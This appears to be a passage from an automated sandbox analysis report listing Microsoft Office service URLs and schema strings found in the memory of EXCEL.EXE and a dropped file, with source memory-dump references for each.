Source: EXCEL.EXE, 00000000.00000003.413455560.000000000F457000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.607735341.000000000F457000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: EXCEL.EXE, 00000000.00000002.605945415.000000000D551000.00000004.00000001.sdmp String found in binary or memory: http://purl.oclc.org/ooxml/drawingml/diagram)
Source: EXCEL.EXE, 00000000.00000002.605945415.000000000D551000.00000004.00000001.sdmp String found in binary or memory: http://purl.oclc.org/ooxml/drawingml/table
Source: EXCEL.EXE, 00000000.00000003.512416539.0000000012F16000.00000004.00000001.sdmp String found in binary or memory: http://schemas.micr/
Source: EXCEL.EXE, 00000000.00000003.455330974.00000000156F1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.454666874.0000000015786000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.454809646.00000000155F0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.open
Source: EXCEL.EXE, 00000000.00000003.455330974.00000000156F1000.00000004.00000001.sdmp String found in binary or memory: http://schemas.openformatrg/package/2006/content-t
Source: EXCEL.EXE, 00000000.00000003.454666874.0000000015786000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.454809646.00000000155F0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.openformatrg/package/2006/r
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: EXCEL.EXE, 00000000.00000003.456916079.0000000012F1B000.00000004.00000001.sdmp String found in binary or memory: http://ww.org
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticatedf
Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticatede
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/removeW
Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/queryK
Source: EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://api.aadrm.com
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://api.aadrm.com/
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://api.aadrm.com7
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://api.addins.store.office.com/addinstemplate
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://api.addins.store.office.com/app/query
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://api.cortana.ai
Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://api.diagnostics.office.com
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://api.diagnostics.office.comom
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://api.diagnosticssdf.office.com
Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://api.microsoftstream.com/api/
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://api.microsoftstream.com/api/nt
Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://api.office.net
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://api.office.net?J
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://api.office.netGK$;a
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://api.office.netvI5=
Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://api.onedrive.com
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://api.onedrive.comcentG
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasetsN
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://apis.live.net/v5.0/
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://augloop.office.com
Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://augloop.office.com/v2
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://augloop.office.com/v2e
Source: EXCEL.EXE, 00000000.00000002.605945415.000000000D551000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
Source: EXCEL.EXE, 00000000.00000002.607398237.000000000F300000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://autodiscover-s.outlook.com/
Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml)
Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://cdn.entity.
Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://client-office365-tas.msedge.net/ab4
Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://clients.config.office.net/
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://clients.config.office.net/5
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://clients.config.office.net/f
Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies%
Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://clients.config.office.net/user/v1.0/iosE.r8%
Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey2
Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkeyl
Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx0
Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://config.edge.skype.com
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://config.edge.skype.com/config/v2/Officei
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://config.edge.skype.com1
Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://cortana.ai
Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://cortana.ai/api
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://cortana.aietl
Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://cr.office.com
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://cr.office.comZ7
Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://dataservice.o365filtering.com
Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://dataservice.o365filtering.com/
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://dataservice.o365filtering.comt
Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
